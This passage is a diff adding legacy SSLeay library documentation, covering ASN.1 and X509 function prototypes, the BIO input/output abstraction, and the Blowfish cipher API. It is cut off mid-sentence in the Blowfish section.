+typedef struct X509_name_entry_st
+	{
+	ASN1_OBJECT *object;
+	ASN1_BIT_STRING *value;
+	int set;
+	int size; 	/* temp variable */
+	} X509_NAME_ENTRY;
+The size is a temporary variable used by i2d_NAME and set is the set number
+for the particular NAME_ENTRY.  A X509_NAME is encoded as a sequence of
+sequence of sets.  Normally each set contains only a single item.
+Sometimes it contains more.  Normally throughout this library there will be
+only one item per set.  The set field contains the 'set' that this entry is
+a member of.  So if you have just created a X509_NAME structure and
+populated it with X509_NAME_ENTRYs, you should then traverse the X509_NAME
+(which is just a STACK) and set the 'set/' field to incrementing numbers.
+For more details on why this is done, read the ASN.1 spec for Distinguished
+Names.
+
+X509_REQ		CertificateRequest
+X509_REQ_INFO		CertificateRequestInfo
+These are used to hold certificate requests.
+
+X509_CRL		CertificateRevocationList
+These are used to hold a certificate revocation list
+
+RSAPrivateKey		PrivateKeyInfo
+RSAPublicKey		PublicKeyInfo
+Both these 'function groups' operate on 'RSA' structures (see rsa.doc).
+The difference is that the RSAPublicKey operations only manipulate the m
+and e fields in the RSA structure.
+
+DSAPrivateKey		DSS private key
+DSAPublicKey		DSS public key
+Both these 'function groups' operate on 'DSS' structures (see dsa.doc).
+The difference is that the RSAPublicKey operations only manipulate the 
+XXX fields in the DSA structure.
+
+DHparams		DHParameter
+This is used to hold the p and g value for The Diffie-Hellman operation.
+The function deal with the 'DH' strucure (see dh.doc).
+
+Now all of these function types can be used with several other functions to give
+quite useful set of general manipulation routines.  Normally one would
+not uses these functions directly but use them via macros. 
+
+char *ASN1_dup(int (*i2d)(),char *(*d2i)(),char *x);
+'x' is the input structure case to a 'char *', 'i2d' is the 'i2d_TYPE'
+function for the type that 'x' is and d2i is the 'd2i_TYPE' function for the
+type that 'x' is.  As is obvious from the parameters, this function
+duplicates the strucutre by transforming it into the DER form and then
+re-loading it into a new strucutre and returning the new strucutre.  This
+is obviously a bit cpu intensive but when faced with a complex dynamic
+structure this is the simplest programming approach.  There are macros for
+duplicating the major data types but is simple to add extras.
+
+char *ASN1_d2i_fp(char *(*new)(),char *(*d2i)(),FILE *fp,unsigned char **x);
+'x' is a pointer to a pointer of the 'desired type'.  new and d2i are the
+corresponding 'TYPE_new' and 'd2i_TYPE' functions for the type and 'fp' is
+an open file pointer to read from.  This function reads from 'fp' as much
+data as it can and then uses 'd2i' to parse the bytes to load and return
+the parsed strucutre in 'x' (if it was non-NULL) and to actually return the
+strucutre.  The behavior of 'x' is as per all the other d2i functions.
+
+char *ASN1_d2i_bio(char *(*new)(),char *(*d2i)(),BIO *fp,unsigned char **x);
+The 'BIO' is the new IO type being used in SSLeay (see bio.doc).  This
+function is the same as ASN1_d2i_fp() except for the BIO argument.
+ASN1_d2i_fp() actually calls this function.
+
+int ASN1_i2d_fp(int (*i2d)(),FILE *out,unsigned char *x);
+'x' is converted to bytes by 'i2d' and then written to 'out'.  ASN1_i2d_fp
+and ASN1_d2i_fp are not really symetric since ASN1_i2d_fp will read all
+available data from the file pointer before parsing a single item while
+ASN1_i2d_fp can be used to write a sequence of data objects.  To read a
+series of objects from a file I would sugest loading the file into a buffer
+and calling the relevent 'd2i' functions.
+
+char *ASN1_d2i_bio(char *(*new)(),char *(*d2i)(),BIO *fp,unsigned char **x);
+This function is the same as ASN1_i2d_fp() except for the BIO argument.
+ASN1_i2d_fp() actually calls this function.
+
+char *	PEM_ASN1_read(char *(*d2i)(),char *name,FILE *fp,char **x,int (*cb)());
+This function will read the next PEM encoded (base64) object of the same
+type as 'x' (loaded by the d2i function).  'name' is the name that is in
+the '-----BEGIN name-----' that designates the start of that object type.
+If the data is encrypted, 'cb' will be called to prompt for a password.  If
+it is NULL a default function will be used to prompt from the password.
+'x' is delt with as per the standard 'd2i' function interface.  This
+function can be used to read a series of objects from a file.  While any
+data type can be encrypted (see PEM_ASN1_write) only RSA private keys tend
+to be encrypted.
+
+char *	PEM_ASN1_read_bio(char *(*d2i)(),char *name,BIO *fp,
+	char **x,int (*cb)());
+Same as PEM_ASN1_read() except using a BIO.  This is called by
+PEM_ASN1_read().
+
+int	PEM_ASN1_write(int (*i2d)(),char *name,FILE *fp,char *x,EVP_CIPHER *enc,
+		unsigned char *kstr,int klen,int (*callback)());
+
+int	PEM_ASN1_write_bio(int (*i2d)(),char *name,BIO *fp,
+		char *x,EVP_CIPHER *enc,unsigned char *kstr,int klen,
+		int (*callback)());
+
+int ASN1_sign(int (*i2d)(), X509_ALGOR *algor1, X509_ALGOR *algor2,
+	ASN1_BIT_STRING *signature, char *data, RSA *rsa, EVP_MD *type);
+int ASN1_verify(int (*i2d)(), X509_ALGOR *algor1,
+	ASN1_BIT_STRING *signature,char *data, RSA *rsa);
+
+int ASN1_BIT_STRING_cmp(ASN1_BIT_STRING *a, ASN1_BIT_STRING *b);
+ASN1_BIT_STRING *ASN1_BIT_STRING_type_new(int type );
+
+int ASN1_UTCTIME_check(ASN1_UTCTIME *a);
+void ASN1_UTCTIME_print(BIO *fp,ASN1_UTCTIME *a);
+ASN1_UTCTIME *ASN1_UTCTIME_dup(ASN1_UTCTIME *a);
+
+ASN1_BIT_STRING *d2i_asn1_print_type(ASN1_BIT_STRING **a,unsigned char **pp,
+		long length,int type);
+
+int		i2d_ASN1_SET(STACK *a, unsigned char **pp,
+			int (*func)(), int ex_tag, int ex_class);
+STACK *		d2i_ASN1_SET(STACK **a, unsigned char **pp, long length,
+			char *(*func)(), int ex_tag, int ex_class);
+
+int i2a_ASN1_OBJECT(BIO *bp,ASN1_OBJECT *object);
+int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a);
+int a2i_ASN1_INTEGER(BIO *bp,ASN1_INTEGER *bs,char *buf,int size);
+
+int ASN1_INTEGER_set(ASN1_INTEGER *a, long v);
+long ASN1_INTEGER_get(ASN1_INTEGER *a);
+ASN1_INTEGER *BN_to_ASN1_INTEGER(BIGNUM *bn, ASN1_INTEGER *ai);
+BIGNUM *ASN1_INTEGER_to_BN(ASN1_INTEGER *ai,BIGNUM *bn);
+
+/* given a string, return the correct type.  Max is the maximum number
+ * of bytes to parse.  It stops parsing when 'max' bytes have been
+ * processed or a '\0' is hit */
+int ASN1_PRINTABLE_type(unsigned char *s,int max);
+
+void ASN1_parse(BIO *fp,unsigned char *pp,long len);
+
+int i2d_ASN1_bytes(ASN1_BIT_STRING *a, unsigned char **pp, int tag, int class);
+ASN1_BIT_STRING *d2i_ASN1_bytes(ASN1_OCTET_STRING **a, unsigned char **pp,
+	long length, int Ptag, int Pclass);
+
+/* PARSING */
+int asn1_Finish(ASN1_CTX *c);
+
+/* SPECIALS */
+int ASN1_get_object(unsigned char **pp, long *plength, int *ptag,
+	int *pclass, long omax);
+int ASN1_check_infinite_end(unsigned char **p,long len);
+void ASN1_put_object(unsigned char **pp, int constructed, int length,
+	int tag, int class);
+int ASN1_object_size(int constructed, int length, int tag);
+
+X509 *	X509_get_cert(CERTIFICATE_CTX *ctx,X509_NAME * name,X509 *tmp_x509);
+int  	X509_add_cert(CERTIFICATE_CTX *ctx,X509 *);
+
+char *	X509_cert_verify_error_string(int n);
+int 	X509_add_cert_file(CERTIFICATE_CTX *c,char *file, int type);
+char *	X509_gmtime (char *s, long adj);
+int	X509_add_cert_dir (CERTIFICATE_CTX *c,char *dir, int type);
+int	X509_load_verify_locations (CERTIFICATE_CTX *ctx,
+		char *file_env, char *dir_env);
+int	X509_set_default_verify_paths(CERTIFICATE_CTX *cts);
+X509 *	X509_new_D2i_X509(int len, unsigned char *p);
+char *	X509_get_default_cert_area(void );
+char *	X509_get_default_cert_dir(void );
+char *	X509_get_default_cert_file(void );
+char *	X509_get_default_cert_dir_env(void );
+char *	X509_get_default_cert_file_env(void );
+char *	X509_get_default_private_dir(void );
+X509_REQ *X509_X509_TO_req(X509 *x, RSA *rsa);
+int	X509_cert_verify(CERTIFICATE_CTX *ctx,X509 *xs, int (*cb)()); 
+
+CERTIFICATE_CTX *CERTIFICATE_CTX_new();
+void CERTIFICATE_CTX_free(CERTIFICATE_CTX *c);
+
+void X509_NAME_print(BIO *fp, X509_NAME *name, int obase);
+int		X509_print_fp(FILE *fp,X509 *x);
+int		X509_print(BIO *fp,X509 *x);
+
+X509_INFO *	X509_INFO_new(void);
+void		X509_INFO_free(X509_INFO *a);
+
+char *		X509_NAME_oneline(X509_NAME *a);
+
+#define X509_verify(x,rsa)
+#define X509_REQ_verify(x,rsa)
+#define X509_CRL_verify(x,rsa)
+
+#define X509_sign(x,rsa,md)
+#define X509_REQ_sign(x,rsa,md)
+#define X509_CRL_sign(x,rsa,md)
+
+#define X509_dup(x509)
+#define d2i_X509_fp(fp,x509)
+#define i2d_X509_fp(fp,x509)
+#define d2i_X509_bio(bp,x509)
+#define i2d_X509_bio(bp,x509)
+
+#define X509_CRL_dup(crl)
+#define d2i_X509_CRL_fp(fp,crl)
+#define i2d_X509_CRL_fp(fp,crl)
+#define d2i_X509_CRL_bio(bp,crl)
+#define i2d_X509_CRL_bio(bp,crl)
+
+#define X509_REQ_dup(req)
+#define d2i_X509_REQ_fp(fp,req)
+#define i2d_X509_REQ_fp(fp,req)
+#define d2i_X509_REQ_bio(bp,req)
+#define i2d_X509_REQ_bio(bp,req)
+
+#define RSAPrivateKey_dup(rsa)
+#define d2i_RSAPrivateKey_fp(fp,rsa)
+#define i2d_RSAPrivateKey_fp(fp,rsa)
+#define d2i_RSAPrivateKey_bio(bp,rsa)
+#define i2d_RSAPrivateKey_bio(bp,rsa)
+
+#define X509_NAME_dup(xn)
+#define X509_NAME_ENTRY_dup(ne)
+
+void X509_REQ_print_fp(FILE *fp,X509_REQ *req);
+void X509_REQ_print(BIO *fp,X509_REQ *req);
+
+RSA *X509_REQ_extract_key(X509_REQ *req);
+RSA *X509_extract_key(X509 *x509);
+
+int		X509_issuer_and_serial_cmp(X509 *a, X509 *b);
+unsigned long	X509_issuer_and_serial_hash(X509 *a);
+
+X509_NAME *	X509_get_issuer_name(X509 *a);
+int		X509_issuer_name_cmp(X509 *a, X509 *b);
+unsigned long	X509_issuer_name_hash(X509 *a);
+
+X509_NAME *	X509_get_subject_name(X509 *a);
+int		X509_subject_name_cmp(X509 *a,X509 *b);
+unsigned long	X509_subject_name_hash(X509 *x);
+
+int		X509_NAME_cmp (X509_NAME *a, X509_NAME *b);
+unsigned long	X509_NAME_hash(X509_NAME *x);
+
+
+==== bio.doc ========================================================
+
+BIO Routines
+
+This documentation is rather sparse, you are probably best 
+off looking at the code for specific details.
+
+The BIO library is a IO abstraction that was originally 
+inspired by the need to have callbacks to perform IO to FILE 
+pointers when using Windows 3.1 DLLs.  There are two types 
+of BIO; a source/sink type and a filter type.
+The source/sink methods are as follows:
+-	BIO_s_mem()  memory buffer - a read/write byte array that
+	grows until memory runs out :-).
+-	BIO_s_file()  FILE pointer - A wrapper around the normal 
+	'FILE *' commands, good for use with stdin/stdout.
+-	BIO_s_fd()  File descriptor - A wrapper around file 
+	descriptors, often used with pipes.
+-	BIO_s_socket()  Socket - Used around sockets.  It is 
+	mostly in the Microsoft world that sockets are different 
+	from file descriptors and there are all those ugly winsock 
+	commands.
+-	BIO_s_null()  Null - read nothing and write nothing.; a 
+	useful endpoint for filter type BIO's specifically things 
+	like the message digest BIO.
+
+The filter types are
+-	BIO_f_buffer()  IO buffering - does output buffering into 
+	larger chunks and performs input buffering to allow gets() 
+	type functions.
+-	BIO_f_md()  Message digest - a transparent filter that can 
+	be asked to return a message digest for the data that has 
+	passed through it.
+-	BIO_f_cipher()  Encrypt or decrypt all data passing 
+	through the filter.
+-	BIO_f_base64()  Base64 decode on read and encode on write.
+-	BIO_f_ssl()  A filter that performs SSL encryption on the 
+	data sent through it.
+
+Base BIO functions.
+The BIO library has a set of base functions that are 
+implemented for each particular type.  Filter BIOs will 
+normally call the equivalent function on the source/sink BIO 
+that they are layered on top of after they have performed 
+some modification to the data stream.  Multiple filter BIOs 
+can be 'push' into a stack of modifers, so to read from a 
+file, unbase64 it, then decrypt it, a BIO_f_cipher, 
+BIO_f_base64 and a BIO_s_file would probably be used.  If a 
+sha-1 and md5 message digest needed to be generated, a stack 
+two BIO_f_md() BIOs and a BIO_s_null() BIO could be used.
+The base functions are
+-	BIO *BIO_new(BIO_METHOD *type); Create  a new BIO of  type 'type'.
+-	int BIO_free(BIO *a); Free a BIO structure.  Depending on 
+	the configuration, this will free the underlying data 
+	object for a source/sink BIO.
+-	int BIO_read(BIO *b, char *data, int len); Read upto 'len' 
+	bytes into 'data'. 
+-	int BIO_gets(BIO *bp,char *buf, int size); Depending on 
+	the BIO, this can either be a 'get special' or a get one 
+	line of data, as per fgets();
+-	int BIO_write(BIO *b, char *data, int len); Write 'len' 
+	bytes from 'data' to the 'b' BIO.
+-	int BIO_puts(BIO *bp,char *buf); Either a 'put special' or 
+	a write null terminated string as per fputs().
+-	long BIO_ctrl(BIO *bp,int cmd,long larg,char *parg);  A 
+	control function which is used to manipulate the BIO 
+	structure and modify it's state and or report on it.  This 
+	function is just about never used directly, rather it 
+	should be used in conjunction with BIO_METHOD specific 
+	macros.
+-	BIO *BIO_push(BIO *new_top, BIO *old); new_top is apped to the
+	top of the 'old' BIO list.  new_top should be a filter BIO.
+	All writes will go through 'new_top' first and last on read.
+	'old' is returned.
+-	BIO *BIO_pop(BIO *bio); the new topmost BIO is returned, NULL if
+	there are no more.
+
+If a particular low level BIO method is not supported 
+(normally BIO_gets()), -2 will be returned if that method is 
+called.  Otherwise the IO methods (read, write, gets, puts) 
+will return the number of bytes read or written, and 0 or -1 
+for error (or end of input).  For the -1 case, 
+BIO_should_retry(bio) can be called to determine if it was a 
+genuine error or a temporary problem.  -2 will also be 
+returned if the BIO has not been initalised yet, in all 
+cases, the correct error codes are set (accessible via the 
+ERR library).
+
+
+The following functions are convenience functions:
+-	int BIO_printf(BIO *bio, char * format, ..);  printf but 
+	to a BIO handle.
+-	long BIO_ctrl_int(BIO *bp,int cmd,long larg,int iarg); a 
+	convenience function to allow a different argument types 
+	to be passed to BIO_ctrl().
+-	int BIO_dump(BIO *b,char *bytes,int len); output 'len' 
+	bytes from 'bytes' in a hex dump debug format.
+-	long BIO_debug_callback(BIO *bio, int cmd, char *argp, int 
+	argi, long argl, long ret) - a default debug BIO callback, 
+	this is mentioned below.  To use this one normally has to 
+	use the BIO_set_callback_arg() function to assign an 
+	output BIO for the callback to use.
+-	BIO *BIO_find_type(BIO *bio,int type); when there is a 'stack'
+	of BIOs, this function scan the list and returns the first
+	that is of type 'type', as listed in buffer.h under BIO_TYPE_XXX.
+-	void BIO_free_all(BIO *bio); Free the bio and all other BIOs
+	in the list.  It walks the bio->next_bio list.
+
+
+
+Extra commands are normally implemented as macros calling BIO_ctrl().
+-	BIO_number_read(BIO *bio) - the number of bytes processed 
+	by BIO_read(bio,.).
+-	BIO_number_written(BIO *bio) - the number of bytes written 
+	by BIO_write(bio,.).
+-	BIO_reset(BIO *bio) - 'reset' the BIO.
+-	BIO_eof(BIO *bio) - non zero if we are at the current end 
+	of input.
+-	BIO_set_close(BIO *bio, int close_flag) - set the close flag.
+-	BIO_get_close(BIO *bio) - return the close flag.
+	BIO_pending(BIO *bio) - return the number of bytes waiting 
+	to be read (normally buffered internally).
+-	BIO_flush(BIO *bio) - output any data waiting to be output.
+-	BIO_should_retry(BIO *io) - after a BIO_read/BIO_write 
+	operation returns 0 or -1, a call to this function will 
+	return non zero if you should retry the call later (this 
+	is for non-blocking IO).
+-	BIO_should_read(BIO *io) - we should retry when data can 
+	be read.
+-	BIO_should_write(BIO *io) - we should retry when data can 
+	be written.
+-	BIO_method_name(BIO *io) - return a string for the method name.
+-	BIO_method_type(BIO *io) - return the unique ID of the BIO method.
+-	BIO_set_callback(BIO *io,  long (*callback)(BIO *io, int 
+	cmd, char *argp, int argi, long argl, long ret); - sets 
+	the debug callback.
+-	BIO_get_callback(BIO *io) - return the assigned function 
+	as mentioned above.
+-	BIO_set_callback_arg(BIO *io, char *arg)  - assign some 
+	data against the BIO.  This is normally used by the debug 
+	callback but could in reality be used for anything.  To 
+	get an idea of how all this works, have a look at the code 
+	in the default debug callback mentioned above.  The 
+	callback can modify the return values.
+
+Details of the BIO_METHOD structure.
+typedef struct bio_method_st
+        {
+	int type;
+	char *name;
+	int (*bwrite)();
+	int (*bread)();
+	int (*bputs)();
+	int (*bgets)();
+	long (*ctrl)();
+	int (*create)();
+	int (*destroy)();
+	} BIO_METHOD;
+
+The 'type' is the numeric type of the BIO, these are listed in buffer.h;
+'Name' is a textual representation of the BIO 'type'.
+The 7 function pointers point to the respective function 
+methods, some of which can be NULL if not implemented.
+The BIO structure
+typedef struct bio_st
+	{
+	BIO_METHOD *method;
+	long (*callback)(BIO * bio, int mode, char *argp, int 
+		argi, long argl, long ret);
+	char *cb_arg; /* first argument for the callback */
+	int init;
+	int shutdown;
+	int flags;      /* extra storage */
+	int num;
+	char *ptr;
+	struct bio_st *next_bio; /* used by filter BIOs */
+	int references;
+	unsigned long num_read;
+	unsigned long num_write;
+	} BIO;
+
+-	'Method' is the BIO method.
+-	'callback', when configured, is called before and after 
+	each BIO method is called for that particular BIO.  This 
+	is intended primarily for debugging and of informational feedback.
+-	'init' is 0 when the BIO can be used for operation.  
+	Often, after a BIO is created, a number of operations may 
+	need to be performed before it is available for use.  An 
+	example is for BIO_s_sock().  A socket needs to be 
+	assigned to the BIO before it can be used.
+-	'shutdown', this flag indicates if the underlying 
+	communication primitive being used should be closed/freed 
+	when the BIO is closed.
+-	'flags' is used to hold extra state.  It is primarily used 
+	to hold information about why a non-blocking operation 
+	failed and to record startup protocol information for the 
+	SSL BIO.
+-	'num' and 'ptr' are used to hold instance specific state 
+	like file descriptors or local data structures.
+-	'next_bio' is used by filter BIOs to hold the pointer of the
+	next BIO in the chain. written data is sent to this BIO and
+	data read is taken from it.
+-	'references' is used to indicate the number of pointers to 
+	this structure.  This needs to be '1' before a call to 
+	BIO_free() is made if the BIO_free() function is to 
+	actually free() the structure, otherwise the reference 
+	count is just decreased.  The actual BIO subsystem does 
+	not really use this functionality but it is useful when 
+	used in more advanced applicaion.
+-	num_read and num_write are the total number of bytes 
+	read/written via the 'read()' and 'write()' methods.
+
+BIO_ctrl operations.
+The following is the list of standard commands passed as the 
+second parameter to BIO_ctrl() and should be supported by 
+all BIO as best as possible.  Some are optional, some are 
+manditory, in any case, where is makes sense, a filter BIO 
+should pass such requests to underlying BIO's.
+-	BIO_CTRL_RESET	- Reset the BIO back to an initial state.
+-	BIO_CTRL_EOF	- return 0 if we are not at the end of input, 
+	non 0 if we are.
+-	BIO_CTRL_INFO	- BIO specific special command, normal
+	information return.
+-	BIO_CTRL_SET	- set IO specific parameter.
+-	BIO_CTRL_GET	- get IO specific parameter.
+-	BIO_CTRL_GET_CLOSE - Get the close on BIO_free() flag, one 
+	of BIO_CLOSE or BIO_NOCLOSE.
+-	BIO_CTRL_SET_CLOSE - Set the close on BIO_free() flag.
+-	BIO_CTRL_PENDING - Return the number of bytes available 
+	for instant reading
+-	BIO_CTRL_FLUSH	- Output pending data, return number of bytes output.
+-	BIO_CTRL_SHOULD_RETRY - After an IO error (-1 returned) 
+	should we 'retry' when IO is possible on the underlying IO object.
+-	BIO_CTRL_RETRY_TYPE - What kind of IO are we waiting on.
+
+The following command is a special BIO_s_file() specific option.
+-	BIO_CTRL_SET_FILENAME - specify a file to open for IO.
+
+The BIO_CTRL_RETRY_TYPE needs a little more explanation.  
+When performing non-blocking IO, or say reading on a memory 
+BIO, when no data is present (or cannot be written), 
+BIO_read() and/or BIO_write() will return -1.  
+BIO_should_retry(bio) will return true if this is due to an 
+IO condition rather than an actual error.  In the case of 
+BIO_s_mem(), a read when there is no data will return -1 and 
+a should retry when there is more 'read' data.
+The retry type is deduced from 2 macros
+BIO_should_read(bio) and BIO_should_write(bio).
+Now while it may appear obvious that a BIO_read() failure 
+should indicate that a retry should be performed when more 
+read data is available, this is often not true when using 
+things like an SSL BIO.  During the SSL protocol startup 
+multiple reads and writes are performed, triggered by any 
+SSL_read or SSL_write.
+So to write code that will transparently handle either a 
+socket or SSL BIO,
+	i=BIO_read(bio,..)
+	if (I == -1)
+		{
+		if (BIO_should_retry(bio))
+			{
+			if (BIO_should_read(bio))
+				{
+				/* call us again when BIO can be read */
+				}
+			if (BIO_should_write(bio))
+				{
+				/* call us again when BIO can be written */
+				}
+			}
+		}
+
+At this point in time only read and write conditions can be 
+used but in the future I can see the situation for other 
+conditions, specifically with SSL there could be a condition 
+of a X509 certificate lookup taking place and so the non-
+blocking BIO_read would require a retry when the certificate 
+lookup subsystem has finished it's lookup.  This is all 
+makes more sense and is easy to use in a event loop type 
+setup.
+When using the SSL BIO, either SSL_read() or SSL_write()s 
+can be called during the protocol startup and things will 
+still work correctly.
+The nice aspect of the use of the BIO_should_retry() macro 
+is that all the errno codes that indicate a non-fatal error 
+are encapsulated in one place.  The Windows specific error 
+codes and WSAGetLastError() calls are also hidden from the 
+application.
+
+Notes on each BIO method.
+Normally buffer.h is just required but depending on the 
+BIO_METHOD, ssl.h or evp.h will also be required.
+
+BIO_METHOD *BIO_s_mem(void);
+-	BIO_set_mem_buf(BIO *bio, BUF_MEM *bm, int close_flag) - 
+	set the underlying BUF_MEM structure for the BIO to use.
+-	BIO_get_mem_ptr(BIO *bio, char **pp) - if pp is not NULL, 
+	set it to point to the memory array and return the number 
+	of bytes available.
+A read/write BIO.  Any data written is appended to the 
+memory array and any read is read from the front.  This BIO 
+can be used for read/write at the same time. BIO_gets() is 
+supported in the fgets() sense.
+BIO_CTRL_INFO can be used to retrieve pointers to the memory 
+buffer and it's length.
+
+BIO_METHOD *BIO_s_file(void);
+-	BIO_set_fp(BIO *bio, FILE *fp, int close_flag) - set 'FILE *' to use.
+-	BIO_get_fp(BIO *bio, FILE **fp) - get the 'FILE *' in use.
+-	BIO_read_filename(BIO *bio, char *name) - read from file.
+-	BIO_write_filename(BIO *bio, char *name) - write to file.
+-	BIO_append_filename(BIO *bio, char *name) - append to file.
+This BIO sits over the normal system fread()/fgets() type 
+functions. Gets() is supported.  This BIO in theory could be 
+used for read and write but it is best to think of each BIO 
+of this type as either a read or a write BIO, not both.
+
+BIO_METHOD *BIO_s_socket(void);
+BIO_METHOD *BIO_s_fd(void);
+-	BIO_sock_should_retry(int i) - the underlying function 
+	used to determine if a call should be retried; the 
+	argument is the '0' or '-1' returned by the previous BIO 
+	operation.
+-	BIO_fd_should_retry(int i) - same as the 
+-	BIO_sock_should_retry() except that it is different internally.
+-	BIO_set_fd(BIO *bio, int fd, int close_flag) - set the 
+	file descriptor to use
+-	BIO_get_fd(BIO *bio, int *fd) - get the file descriptor.
+These two methods are very similar.  Gets() is not 
+supported, if you want this functionality, put a 
+BIO_f_buffer() onto it.  This BIO is bi-directional if the 
+underlying file descriptor is.  This is normally the case 
+for sockets but not the case for stdio descriptors.
+
+BIO_METHOD *BIO_s_null(void);
+Read and write as much data as you like, it all disappears 
+into this BIO.
+
+BIO_METHOD *BIO_f_buffer(void);
+-	BIO_get_buffer_num_lines(BIO *bio) - return the number of 
+	complete lines in the buffer.
+-	BIO_set_buffer_size(BIO *bio, long size) - set the size of 
+	the buffers.
+This type performs input and output buffering.  It performs 
+both at the same time.  The size of the buffer can be set 
+via the set buffer size option.  Data buffered for output is 
+only written when the buffer fills.
+
+BIO_METHOD *BIO_f_ssl(void);
+-	BIO_set_ssl(BIO *bio, SSL *ssl, int close_flag) - the SSL 
+	structure to use.
+-	BIO_get_ssl(BIO *bio, SSL **ssl) - get the SSL structure 
+	in use.
+The SSL bio is a little different from normal BIOs because 
+the underlying SSL structure is a little different.  A SSL 
+structure performs IO via a read and write BIO.  These can 
+be different and are normally set via the
+SSL_set_rbio()/SSL_set_wbio() calls.  The SSL_set_fd() calls 
+are just wrappers that create socket BIOs and then call 
+SSL_set_bio() where the read and write BIOs are the same.  
+The BIO_push() operation makes the SSLs IO BIOs the same, so 
+make sure the BIO pushed is capable of two directional 
+traffic.  If it is not, you will have to install the BIOs 
+via the more conventional SSL_set_bio() call.  BIO_pop() will retrieve
+the 'SSL read' BIO.
+
+BIO_METHOD *BIO_f_md(void);
+-	BIO_set_md(BIO *bio, EVP_MD *md) - set the message digest 
+	to use.
+-	BIO_get_md(BIO *bio, EVP_MD **mdp) - return the digest 
+	method in use in mdp, return 0 if not set yet.
+-	BIO_reset() reinitializes the digest (EVP_DigestInit()) 
+	and passes the reset to the underlying BIOs.
+All data read or written via BIO_read() or BIO_write() to 
+this BIO will be added to the calculated digest.  This 
+implies that this BIO is only one directional.  If read and 
+write operations are performed, two separate BIO_f_md() BIOs 
+are reuqired to generate digests on both the input and the 
+output.  BIO_gets(BIO *bio, char *md, int size) will place the 
+generated digest into 'md' and return the number of bytes.  
+The EVP_MAX_MD_SIZE should probably be used to size the 'md' 
+array.  Reading the digest will also reset it.
+
+BIO_METHOD *BIO_f_cipher(void);
+-	BIO_reset() reinitializes the cipher.
+-	BIO_flush() should be called when the last bytes have been 
+	output to flush the final block of block ciphers.
+-	BIO_get_cipher_status(BIO *b), when called after the last 
+	read from a cipher BIO, returns non-zero if the data 
+	decrypted correctly, otherwise, 0.
+-	BIO_set_cipher(BIO *b, EVP_CIPHER *c, unsigned char *key, 
+	unsigned char *iv, int encrypt)   This function is used to 
+	setup a cipher BIO.  The length of key and iv are 
+	specified by the choice of EVP_CIPHER.  Encrypt is 1 to 
+	encrypt and 0 to decrypt.
+
+BIO_METHOD *BIO_f_base64(void);
+-	BIO_flush() should be called when the last bytes have been output.
+This BIO base64 encodes when writing and base64 decodes when 
+reading.  It will scan the input until a suitable begin line 
+is found.  After reading data, BIO_reset() will reset the 
+BIO to start scanning again.  Do not mix reading and writing 
+on the same base64 BIO.  It is meant as a single stream BIO.
+
+Directions	type
+both		BIO_s_mem()
+one/both	BIO_s_file()
+both		BIO_s_fd()
+both		BIO_s_socket() 
+both		BIO_s_null()
+both		BIO_f_buffer()
+one		BIO_f_md()  
+one		BIO_f_cipher()  
+one		BIO_f_base64()  
+both		BIO_f_ssl()
+
+It is easy to mix one and two directional BIOs, all one has 
+to do is to keep two separate BIO pointers for reading and 
+writing and be careful about usage of underlying BIOs.  The 
+SSL bio by it's very nature has to be two directional but 
+the BIO_push() command will push the one BIO into the SSL 
+BIO for both reading and writing.
+
+The best example program to look at is apps/enc.c and/or perhaps apps/dgst.c.
+
+
+==== blowfish.doc ========================================================
+
+The Blowfish library.
+
+Blowfish is a block cipher that operates on 64bit (8 byte) quantities.  It
+uses variable size key, but 128bit (16 byte) key would normally be considered
+good.  It can be used in all the modes that DES can be used.  This
+library implements the ecb, cbc, cfb64, ofb64 modes.
+
+Blowfish is quite a bit faster that DES, and much faster than IDEA or
+RC2.  It is one of the faster block ciphers.
+
+For all calls that have an 'input' and 'output' variables, they can be the
+same.
+
+This library requires the inclusion of 'blowfish.h'.
+
+All of the encryption functions take what is called an BF_KEY as an 
+argument.  An BF_KEY is an expanded form of the Blowfish key.
+For all modes of the Blowfish algorithm, the BF_KEY used for
+decryption is the same one that was used for encryption.
+
+The define BF_ENCRYPT is passed to specify encryption for the functions
+that require an encryption/decryption flag. BF_DECRYPT is passed to
+specify decryption.
+
+Please note that any of the encryption modes specified in my DES library
+could be used with Blowfish.  I have only implemented ecb, cbc, cfb64 and
+ofb64 for the following reasons.
+- ecb is the basic Blowfish encryption.
+- cbc is the normal 'chaining' form for block ciphers.
+- cfb64 can be used to encrypt single characters, therefore input and output
+  do not need to be a multiple of 8.
+- ofb64 is similar to cfb64 but is more like a stream cipher, not as
+  secure (not cipher feedback) but it does not have an encrypt/decrypt mode.
+- If you want triple Blowfish, thats 384 bits of key and you must be totally
+  obsessed with security.  Still, if you want it, it is simple enough to
+  copy the function from the DES library and change the des_encrypt to
+  BF_encrypt; an exercise left for the paranoid reader :-).
+
+The functions are as follows:
+
+void BF_set_key(
+BF_KEY *ks;
+int len;
+unsigned char *key;
+        BF_set_key converts an 'len' byte key into a BF_KEY.
+        A 'ks' is an expanded form of the 'key' which is used to
+        perform actual encryption.  It can be regenerated from the Blowfish key
+        so it only needs to be kept when encryption or decryption is about
+        to occur.  Don't save or pass around BF_KEY's since they
+        are CPU architecture dependent, 'key's are not.  Blowfish is an
+	interesting cipher in that it can be used with a variable length
+	key.  'len' is the length of 'key' to be used as the key.
+	A 'len' of 16 is recomended by me, but blowfish can use upto
+	72 bytes.  As a warning, blowfish has a very very slow set_key
+	function, it actually runs BF_encrypt 521 times.
+	
+void BF_encrypt(unsigned long *data, BF_KEY *key);
+void BF_decrypt(unsigned long *data, BF_KEY *key);
+	These are the Blowfish encryption function that gets called by just
+	about every other Blowfish routine in the library.  You should not
+	use this function except to implement 'modes' of Blowfish.
+	I say this because the
+	functions that call this routine do the conversion from 'char *' to
+	long, and this needs to be done to make sure 'non-aligned' memory
+	access do not occur.
+	Data is a pointer to 2 unsigned long's and key is the
+	BF_KEY to use. 
+
+void BF_ecb_encrypt(
+unsigned char *in,
+unsigned char *out,
+BF_KEY *key,
+int encrypt);
+	This is the basic Electronic Code Book form of Blowfish (in DES this
+	mode is called Electronic Code Book so I'm going to use the term
+	for blowfish as well.
+	Input is encrypted into output using the key represented by
+	key.  Depending on the encrypt, encryption or
+	decryption occurs.  Input is 8 bytes long and output is 8 bytes.
+	
+void BF_cbc_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+BF_KEY *ks,
+unsigned char *ivec,
+int encrypt);
+	This routine implements Blowfish in Cipher Block Chaining mode.
+	Input, which should be a multiple of 8 bytes is encrypted
+	(or decrypted) to output which will also be a multiple of 8 bytes.
+	The number of bytes is in length (and from what I've said above,
+	should be a multiple of 8).  If length is not a multiple of 8, bad 
